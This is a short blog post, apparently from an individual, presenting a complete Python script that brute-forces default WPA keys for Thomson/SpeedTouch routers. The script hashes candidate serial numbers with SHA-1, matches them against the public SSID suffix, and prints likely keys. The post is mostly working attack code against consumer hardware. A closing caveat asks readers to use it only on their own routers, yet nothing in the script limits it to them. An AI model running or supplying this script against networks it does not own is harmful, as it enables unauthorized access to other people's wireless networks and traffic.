In case you didn’t know, the default WPA key in Thomson/SpeedTouch routers is generated from the router’s serial. By some strange coincidence, so is the router’s SSID, which means that if you know the SSID (which is public knowledge), you can brute-force the serial.
There are programs to do this already, but they were not future-proof or open enough to work now, so I wrote a small Python script to do it. Just enter the last part of the router’s SSID (e.g. 99AF3C in Thomson-99AF3C) and the script will find the likely WPA keys.
You can use this script to verify that your router is vulnerable and change the encryption key, but please don’t use it to break into other people’s networks! That’s rude.
EDIT: I updated the algorithm, it now features 200% more correctness and 400% more slowness :/ Sadly, it’s many times slower than similar tools, but maybe it will be useful to you somehow. Speedup tips appreciated!
Here it is:
#!/usr/bin/env python
import sys
import hashlib
from binascii import hexlify as hexl
from itertools import product as prod
try:
import psyco
psyco.full()
except:
pass
if len(sys.argv) != 2:
print "speedtouchkey.py <SSID>"
sys.exit(1)
chars = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ"
ssid = sys.argv[1].lower().strip()
try:
int(ssid, 16)
except ValueError:
print "%s is not a valid SSID." % ssid
sys.exit(1)
for year in range(8,11):
print "Searching year %02d..." % year
for week in range(1, 53):
for xxx in prod(chars, chars, chars):
xx = "".join(xxx)
serial = "CP%02d%02d%s" % (year, week, hexl(xx).upper())
sha = hashlib.sha1(serial).hexdigest()
if sha.endswith(ssid):
print " Likely key: %s (serial %s)." % (sha[:10], "CP%02d%02d??%s" % (year, week, xx))